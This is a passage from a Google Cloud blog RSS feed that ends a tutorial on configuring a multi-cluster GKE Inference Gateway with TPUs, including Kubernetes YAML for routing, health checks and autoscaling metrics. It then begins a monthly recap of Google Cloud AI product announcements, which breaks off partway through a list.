&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Configure the Multi-Cluster Inference Gateway.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Install the necessary Custom Resource Definitions (CRDs) so Kubernetes can process specialized routing objects like the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;InferenceObjective&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy an &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AutoscalingMetric&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to track hardware utilization, such as KV cache usage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Use Helm to group the independent AI deployments from both regions into a single, logical &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;InferencePool&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy the Cross-Region Gateway and its associated &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;HTTPRoute&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to manage incoming global traffic.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Apply health checks and backend policies to the pool to ensure load balancing relies on your custom hardware metrics.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Configure an &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;InferenceObjective&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to instruct the gateway to route prompts to the region with the highest availability, avoiding overloaded TPUs.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: gateway.networking.k8s.io/v1\r\nkind: Gateway\r\nmetadata:\r\n  name: cross-region-gateway\r\n  namespace: default\r\nspec:\r\n  gatewayClassName: gke-l7-cross-regional-internal-managed-mc\r\n  addresses:\r\n  - type: networking.gke.io/named-address-with-region\r\n    value: &amp;quot;regions/europe-west4/addresses/gemma-gateway-ip-europe-west4&amp;quot;\r\n  - type: networking.gke.io/named-address-with-region\r\n    value: &amp;quot;regions/us-east5/addresses/gemma-gateway-ip-us-east5&amp;quot;\r\n  listeners:\r\n  - name: http\r\n    protocol: HTTP\r\n    port: 80\r\n---\r\napiVersion: gateway.networking.k8s.io/v1\r\nkind: HTTPRoute\r\nmetadata:\r\n  name: gemma-route\r\n  namespace: default\r\nspec:\r\n  parentRefs:\r\n  - name: cross-region-gateway\r\n    kind: Gateway\r\n  rules:\r\n  - backendRefs:\r\n    - group: networking.gke.io\r\n      kind: GCPInferencePoolImport\r\n      name: gemma-pool\r\n      port: 8000\r\n---\r\napiVersion: networking.gke.io/v1\r\nkind: HealthCheckPolicy\r\nmetadata:\r\n  name: gemma-health-check\r\n  namespace: default\r\nspec:\r\n  targetRef:\r\n    group: networking.gke.io\r\n    kind: GCPInferencePoolImport\r\n    name: gemma-pool\r\n  default:\r\n    config:\r\n      type: HTTP\r\n      httpHealthCheck:\r\n        requestPath: /health\r\n        port: 8000\r\n---\r\napiVersion: networking.gke.io/v1\r\nkind: GCPBackendPolicy\r\nmetadata:\r\n  name: gemma-backend-policy\r\n  namespace: default\r\nspec:\r\n  targetRef:\r\n    group: networking.gke.io\r\n    kind: GCPInferencePoolImport\r\n    name: gemma-pool\r\n  default:\r\n    timeoutSec: 100\r\n    balancingMode: CUSTOM_METRICS\r\n    trafficDuration: LONG\r\n    customMetrics:\r\n      - name: gke.named_metrics.tpu-cache\r\n        dryRun: false\r\n        maxUtilizationPercent: 60\r\n---\r\napiVersion: autoscaling.gke.io/v1beta1\r\nkind: AutoscalingMetric\r\nmetadata:\r\n  name: tpu-cache\r\n  namespace: default\r\nspec:\r\n  selector:\r\n    matchLabels:\r\n      app: gemma-server\r\n  endpoints:\r\n  - port: 8000\r\n    path: /metrics\r\n    metrics:\r\n    - name: vllm:kv_cache_usage_perc\r\n      exportName: tpu-cache\r\n---\r\napiVersion: inference.networking.x-k8s.io/v1alpha2\r\nkind: InferenceObjective\r\nmetadata:\r\n  name: gemma-objective\r\n  namespace: default\r\nspec:\r\n  priority: 10\r\n  poolRef:\r\n    name: gemma-pool\r\n    group: &amp;quot;inference.networking.k8s.io&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d1ddfd60&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div data-draftjs-conductor-fragment='{"blocks":[{"key":"5k3m6","text":"Testing the Failover","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":20,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"38ue0","text":"Verify the highly available architecture by simulating a primary region outage. Once the primary deployment is taken offline, the Gateway automatically detects the failure and seamlessly reroutes all subsequent user requests to the active secondary cluster, ensuring continuous availability without dropping traffic.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"44u08","text":"Next Steps","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"3k54t","text":"Take a deeper dive into a hands-on codelab and more information on these features review the following.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"ohd6","text":"Hands-on Codelab: Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":18,"length":92,"key":0}],"data":{}},{"key":"4jgt1","text":"Document set: DRANET","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":14,"length":6,"key":1}],"data":{}},{"key":"ep7ne","text":"Documentation: AI Hypercomputer","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":15,"length":16,"key":2}],"data":{}},{"key":"3c9h1","text":"Want to ask a question, find out more or share a thought? Please connect with me on Linkedin.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":84,"length":8,"key":3}],"data":{}}],"entityMap":{"0":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://codelabs.developers.google.com/codelabs/gke-inference-gateway-multi-cluster-tpus-dranet"}},"1":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/kubernetes-engine/docs/how-to/config-auto-net-for-accelerators"}},"2":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/ai-hypercomputer/docs/overview"}},"3":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://www.linkedin.com/in/ammett/"}}}}'&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="cl1on" data-offset-key="czag4-0-0"&gt;
&lt;h3 class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="czag4-0-0"&gt;&lt;span data-offset-key="czag4-0-0"&gt;Testing the Failover&lt;/span&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="cl1on" data-offset-key="9un4f-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9un4f-0-0"&gt;&lt;span data-offset-key="9un4f-0-0"&gt;Verify the highly available architecture by simulating a primary region outage. Once the primary deployment is taken offline, the Gateway automatically detects the failure and seamlessly reroutes all subsequent user requests to the active secondary cluster, ensuring continuous availability without dropping traffic.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="ef2kc-0-0"&gt; &lt;/div&gt;
&lt;h2 class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="ef2kc-0-0"&gt;&lt;span data-offset-key="ef2kc-0-0"&gt;Next Steps&lt;/span&gt;&lt;/h2&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="cl1on" data-offset-key="1r2f1-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="1r2f1-0-0"&gt;&lt;span data-offset-key="1r2f1-0-0"&gt;Take a deeper dive into a hands-on codelab and more information on these features review the following.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;ul class="public-DraftStyleDefault-ul" data-offset-key="6fjff-0-0"&gt;
&lt;li class="Draftail-block--unordered-list-item public-DraftStyleDefault-unorderedListItem public-DraftStyleDefault-reset public-DraftStyleDefault-depth0 public-DraftStyleDefault-listLTR" data-block="true" data-editor="cl1on" data-offset-key="6fjff-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="6fjff-0-0"&gt;&lt;span data-offset-key="6fjff-0-0"&gt;Hands-on Codelab: &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://codelabs.developers.google.com/codelabs/gke-inference-gateway-multi-cluster-tpus-dranet" rel="noopener" role="button" target="_blank"&gt;&lt;span data-offset-key="6fjff-1-0"&gt;Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li class="Draftail-block--unordered-list-item public-DraftStyleDefault-unorderedListItem public-DraftStyleDefault-depth0 public-DraftStyleDefault-listLTR" data-block="true" data-editor="cl1on" data-offset-key="9ku8e-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9ku8e-0-0"&gt;&lt;span data-offset-key="9ku8e-0-0"&gt;Document set: &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/config-auto-net-for-accelerators" role="button"&gt;&lt;span data-offset-key="9ku8e-1-0"&gt;DRANET&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li class="Draftail-block--unordered-list-item public-DraftStyleDefault-unorderedListItem public-DraftStyleDefault-depth0 public-DraftStyleDefault-listLTR" data-block="true" data-editor="cl1on" data-offset-key="3fjdr-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="3fjdr-0-0"&gt;&lt;span data-offset-key="3fjdr-0-0"&gt;Documentation: &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://docs.cloud.google.com/ai-hypercomputer/docs/overview" role="button"&gt;&lt;span data-offset-key="3fjdr-1-0"&gt;AI Hypercomputer&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="cl1on" data-offset-key="f0ecg-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="f0ecg-0-0"&gt;&lt;span data-offset-key="f0ecg-0-0"&gt;Want to ask a question, find out more or share a thought? Please connect with me on &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://www.linkedin.com/in/ammett/" rel="noopener" role="button" target="_blank"&gt;&lt;span data-offset-key="f0ecg-1-0"&gt;Linkedin&lt;/span&gt;&lt;/a&gt;&lt;span data-offset-key="f0ecg-2-0"&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;</description><pubDate>Tue, 02 Jun 2026 07:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/developers-practitioners/experimenting-with-tpus-gke-managed-dranet-and-multi-cluster-inference-gateway/</guid><category>Networking</category><category>Developers &amp; Practitioners</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/0-hero-dra.max-600x600.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Experimenting with TPUs, GKE Managed DRANET, and Multi-cluster Inference Gateway</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/0-hero-dra.max-600x600.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/developers-practitioners/experimenting-with-tpus-gke-managed-dranet-and-multi-cluster-inference-gateway/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Ammett Williams</name><title>Developer Relations Engineer</title><department></department><company></company></author></item><item><title>What Google Cloud announced in AI this month</title><link>https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month/</link><description>&lt;div class="block-paragraph"&gt;&lt;p data-block-key="wws10"&gt;&lt;b&gt;&lt;i&gt;Editor’s note&lt;/i&gt;&lt;/b&gt;&lt;i&gt;: Want to keep up with the latest from Google Cloud? Check back here for a monthly recap of our latest updates, announcements, resources, events, learning opportunities, and more.&lt;/i&gt;&lt;/p&gt;&lt;hr/&gt;&lt;p data-block-key="3o743"&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve had a busy month! Between announcing Gemini Spark and Gemini 3.5 at Google I/O – and unveiling Google AI Threat Defense, our latest AI-powered cybersecurity solution, we had a lot to share with Google Cloud customers. Keeping up with the latest news takes time, so we gathered the most important announcements, thought leadership, and technical guides in one place to help you quickly catch up.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more about our I/O announcements, here’s &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/innovations-from-google-io-26-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;everything you need to know&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Google Cloud customers, and &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/startups/startup-news-from-io-and-what-it-means-to-founders?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;top news for startups&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Top announcements&lt;/strong&gt;&lt;/h3&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Introducing Google AI Threat Defense to help you outpace the adversary: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud is introducing a comprehensive AI-powered cybersecurity solution — Google AI Threat Defense — an always-on autonomous security platform. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini 3.5:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our latest family of models combines frontier intelligence with action – starting with Gemini 3.5 Flash. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Omni:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our new model is a leap forward in world understanding, multimodality, and editing, letting you generate any output from any input, starting with video. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Antigravity: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Antigravity’s expanded capabilities and new integration with Agent Platform bring agentic development to your entire organization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Spark: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;For Gemini Enterprise and Workspace customers, Gemini Spark is your 24/7 personal AI agent that helps you work more efficiently by autonomously taking action on your behalf, under your direction. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Workspace: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Pics, our new image generation and editing tool, and new voice features in Gmail, Docs and Keep, help reimagine how you work.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed Agents API on Agent Platform:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Allows developers to build and run custom agents inside secure, Google-hosted environments that seamlessly integrate with Agent Platform.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;CodeMender:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A powerful AI security agent provided through Agent Platform, CodeMender can help find and fix vulnerabilities in your code.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Nano Banana 2 and Nano Banana Pro are generally available: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Available today via Gemini Enterprise Agent Platform, organizations are already putting the models to work. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/nano-banana-2-and-nano-banana-pro-are-generally-available?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Thought leadership (editor’s pick): &lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief strategy officer, Wiz. While threat actors have seen gains from the adversarial misuse of AI, Google and Wiz are tackling these challenges head-on by combining Wiz's deep cloud telemetry with Google's world-class AI and quantum research to help CISOs and their organizations meet the needs of the agentic enterprise era. Read more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;News you can use: &lt;/strong&gt;&lt;/h3&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;What Google I/O '26 means for developing agents on Google Cloud: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Dig deep into how Gemini Enterprise Agent Platform and the new developer tools shared at I/O fit together, unpack the spectrum of choice for building, and share what we’d actually try first. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/io26-news-for-agent-developers-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Five must-have guides to move agents into production with Gemini Enterprise Agent Platform:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Here is a look back at our five-part series covering the architecture patterns and best practices you need to move your agents into production. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/five-guides-to-building-and-scaling-production-ready-ai-agents?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;How to build an AI-ready security program for the public sector:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; From industrial control systems to decades-old municipal databases, here’s our CISO guidance to prep AI-ready security programs for the public sector. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-to-build-an-ai-ready-security-program-for-the-public-sector"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;$300 in free credit to try Google Cloud AI and ML&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d1318280&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Start building for free&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/&amp;#x27;), (&amp;#x27;image&amp;#x27;, None)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr/&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;April&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We hosted &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/google-cloud-next/welcome-to-google-cloud-next25?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Next&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in Las Vegas on April 22, announcing incredible innovations from Gemini Enterprise Agent Platform to our eight-generation TPUs. We also expanded the Gemini Enterprise app in collaborative ways – now, with new features like Projects, you can work side-by-side with your agents and colleagues. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you missed the livestream, take a look at our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/google-cloud-next/next26-day-1-recap"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Day 1 recap&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. It’s been incredible to see how customers have been applying AI in thousands of ways — so far, we’ve counted &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/101-real-world-generative-ai-use-cases-from-industry-leaders?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;more than 1,300 examples&lt;/span&gt;&lt;/a&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top announcements&lt;/span&gt;&lt;/h3&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Gemini Enterprise Agent Platform: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Our new, comprehensive platform to build, scale, govern, and optimize agents. Moving forward, all Vertex AI services and roadmap evolutions will be delivered exclusively through the Agent Platform, rather than as a standalone service, to power the next generation of agent development. &lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The platform is designed around four core pillars — &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;build, scale, govern, and optimize&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; —&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;that allow teams to collaborate seamlessly. Learn more about Agent Platform &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_0_gemini_enterprise_agent_platform.max-1000x1000.jpg"
        
          alt="1 gemini enterprise agent platform"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Gemini Enterprise&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;app&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; has all the key components to let teams discover, create, share, and run AI agents in a single environment. At Next ‘26, we introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/whats-new-in-gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;several new capabilities&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in the Gemini Enterprise app:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Designer &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses the same no-code agent designer experience of Agent Platform and lets employees build sophisticated schedule- and trigger-based agents using any enterprise connector. It gives you a virtual flowchart of your agent, allowing you to inspect, test, and approve workflows, ensuring total transparency for executing critical business processes.  &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Long-running agents &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;are&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;designed to execute complex business processes. They can work autonomously in secure cloud sandboxes, giving agents the ability to orchestrate business logic, write code to build custom tools, and complete multi-step work like reconciliation activities or sales prospect sequencing — without needing constant prompting. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
